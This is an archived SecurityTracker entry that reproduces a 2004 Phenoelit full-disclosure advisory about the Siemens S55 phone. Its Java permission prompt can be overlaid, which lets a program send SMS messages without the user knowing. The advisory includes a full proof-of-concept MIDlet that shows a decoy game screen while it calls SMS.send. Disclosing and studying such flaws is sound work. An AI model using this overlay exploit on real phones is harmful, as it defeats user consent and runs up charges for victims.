SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (VoIP/Phone/FAX)  >   Siemens Phone Vendors:   Siemens
Siemens S55 Phone Lets Remote Users Send Unauthorized SMS Messages
SecurityTracker Alert ID:  1009959
SecurityTracker URL:  http://securitytracker.com/id/1009959
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 27 2004
Impact:   Modification of user information
Exploit Included:  Yes  
Version(s): S55, possibly others
Description:   A vulnerability was reported in the Siemens S55 phone. A remote user can cause a target user's phone to send out SMS messages.

FtR and FX of Phenoelit Group reported that a remote user can create Java code that, when loaded by the target user, will send an SMS message from the target user's system without asking for permission. This is due to a race condition during which the Java code can overlay the normal permission request with an arbitrary screen display, the report said.

A demonstration exploit example is provided in the Source Message.

The vendor was reportedly notified on November 9, 2003.

Impact:   A remote user can create Java code that, when loaded by the target user, will send out an SMS message without the target user's permission.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.siemens.com/ (Links to External Site)
Cause:   Access control error, State error

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>


Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
[ Authors ]
        FtR             <ftr@phenoelit.de>
        FX              <fx@phenoelit.de>

        Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
        Siemens S55 
                Possibly others 

        Siemens :               Not assigned

[ Vendor communication ]
        09/Nov/03       Initial Notification, support@siemens.de
                        *Note-Initial notification by phenoelit
                        includes a cc to cert@cert.org by default

[ Overview ]
        The Siemens S55 is a cellphone and provides a Java virtual machine 
        including a full featured API for additional software development
        by third parties. 

[ Description ]

        The Java API provides the possibilty to send out SMS messages through
        the Java Applications. This interface will ask for permissions to send
        out the SMS by presenting a message screen.

        The API also provides objects which alow a programmer to create
        personal screen layouts for his applications 

        The vulnerability found can be described as a race condition
        which allows the programmer to overlay the message which asks for 
        permission by his own screen craft.

        The result of that vulnerability will allow any program to 
        send SMS to any number without notification to the user

[ Example ]

        package hello;                                                                                               
        import javax.microedition.lcdui.*;                                                                           
        import javax.microedition.midlet.*;                                                                          
        import com.siemens.mp.game.Sound;                                                                            
        import com.siemens.mp.gsm.*;                                                                                 
        import java.lang.*;                                                                                          
        import java.io.*;                                                                                            
                                                                                                             
        public class hello extends MIDlet implements CommandListener                                                 
        {                                                                                                            
           static final String EXIT_COMMAND_LABEL = "Exit FtRs world";                                              
           Display             display;                                                                              
           static hello        hello;                                                                                

           public void startApp (){                                                                                  
              HelloCanva kanvas = new HelloCanva();                                                                  
              Scr2 scr2 = new Scr2();                                                                                
              display = Display.getDisplay(this);                                                                    
              // Menu                                                                                                
              Command exitCommand  = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);                            
              scr2.addCommand(exitCommand);                                                                          
              scr2.setCommandListener(this);                                                                         
              //Data                                                                                                 
                                                                                                             
              // screen 1                                                                                            
              display.setCurrent(kanvas);                                                                            
              mycall();                                                                                              
              // screen 2                                                                                            
              display.setCurrent(scr2);                                                                              
              //destroyApp(false);                                                                                   
            }                                                                                                         
                                                                                                             
            public void mycall(){                                                                                     
                                                                                                             
            String SMSstr= "Test";                                                                             
                                                                                                             
            try {                                                                                                
                /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/                                                             
          
                        SMS.send("0170-Numder", SMSstr);                                                     
                }                                                                                                    
                /* Exception handling */                                                                             
                catch (com.siemens.mp.NotAllowedException ex) {                                                      
                // Some handling code ...                                                                            
                }                                                                                                    
                catch (IOException ex) {                                                                             
                //Some handling code ...                                                                           
                }                                                                                                    
                catch (IllegalArgumentException ex) {                                                                
                // Some handling code ...                                                                            
                }                                                                                                    
          } //public viod call()                                                                                    
                                                                                                             
           protected void destroyApp (boolean b){                                                                    
              display.setCurrent(null);                                                                              
              this.notifyDestroyed();       // notify KVM                                                            
           }                                                                                                         
                                                                                                             
           protected void pauseApp ()                                                                                
           { }                                                                                                       
                                                                                                             
           public void commandAction (Command c, Displayable d){                                                     
              destroyApp(false);                                                                                 
           }                                                                                                         
                                                                                                             
        }                                                                                                            
                                                                                                             
        class HelloCanva extends Canvas                                                                              
        {                                                                                                            
            public void paint (Graphics g)                                                                           
            {                                                                                                        
                String str = new String("Wanna Play?");                                                              
                g.setColor(0,0,0);                                                                                   
                g.fillRect(0, 0, getWidth(), getHeight());                                                           
                g.setColor(255,0,0);                                                                                 
                g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);                 
                g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);     
                g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);      
            }                                                                                                        
        }                                                                                                            
        class Scr2 extends Canvas                                                                                    
        {                                                                                                            
            public void paint (Graphics g) {                                                                         
                String str = new String("cool");                                                                     
                g.setColor(0,0,0);                                                                                   
                g.fillRect(0, 0, getWidth(), getHeight());                                                           
                g.setColor(255,0,0);                                                                                 
                g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);                 
            }                                                                                                        
        }                                                                                                        

[ Solution ]

        None known at this time. 

[ end of file ]

-- 
#!/usr/local/bin/perl 
print&f(($_=(3x3)."3+33")=~s=3(?![^3]|$)=&f=eg);
sub f{eval(@_?$_:"'$&+'x3");} 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC